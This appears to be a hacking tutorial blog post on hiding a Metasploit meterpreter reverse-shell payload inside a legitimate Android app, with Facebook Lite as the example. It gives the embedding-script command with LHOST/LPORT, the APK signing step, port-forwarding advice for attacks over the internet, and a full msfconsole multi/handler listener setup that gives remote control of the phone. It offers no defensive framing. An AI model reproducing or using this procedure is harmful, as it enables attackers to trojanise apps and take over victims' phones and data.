Today we will study how to create payload for android devices
We will bind an authentic APK file with a meterpreter payload!
Lets Begin
1. Download an authentic APK. Facebook Lite in our example
2. Now We will be using an automated script written in Ruby
What this script does?
Creates an android payload like the one from msfvenom
Decompiles the payload.apk
Decompiles the original app apk, in this case facebook lite
now , it binds/hooks payload activity to the main launcher activity
of original app
NOTE : Once you run the command, if you are lucky, the script will do everything by itself and complete the whole process. But more than often it cannot determine to which Activity of the App it should bind the Payload to, so it asks you to select it. In that case, leave the terminal with the script at the prompt, and browse to /root/original.
Then open the AndroidManifest.xml file using any text editor of your liking and look for an ‘activity’ tag which contains both the texts ‘.MAIN’ and ‘.LAUNCHER’. When you find that tag, look for the ‘android:name’ attribute of that tag and note the name of that Activity.
At the prompt of the Ruby script, enter the number corresponding to the Activity name you had noted previously and press Enter.
For example, refer to
http://vinayakwadhwa.in/hook1.jpg
http://vinayakwadhwa.in/hook2.jpg
it then rebuilds the new apk, updates the file’s android manifest.
How is the command :-
ruby apk-embed-payload.rb #orignalapk# -p #payload# LHOST #yourIP# LPORT #AnyPort#
NOTE: if you want, you can port forward your local machine port 192.168.x.x:yyyy to your router’s public IP:port . in case you want to test it over the internet and not just WLAN.
3. We will then sign the apk using d2j-apk-sign command.
Lets do it!
# d2j-apk-sign #apk-name#
4. Now app is installed on phone.
5. Lets create a listener!
# msfconsole
# use exploit/multi/handler
# set payload android/meterpreter/reverse_tcp
# set LHOST # your IP #
# set LPORT #mentioned while making payload#
# exploit
6. Run the app
7. you are the boss !
there are some advanced adb shell commands as well to play around, do your research!
hint : start service call
Link to the apk-embed-payload.rb file
http://vinayakwadhwa.in/apk-embed-payload.rb
#android #hacking #meterpreter #anon
source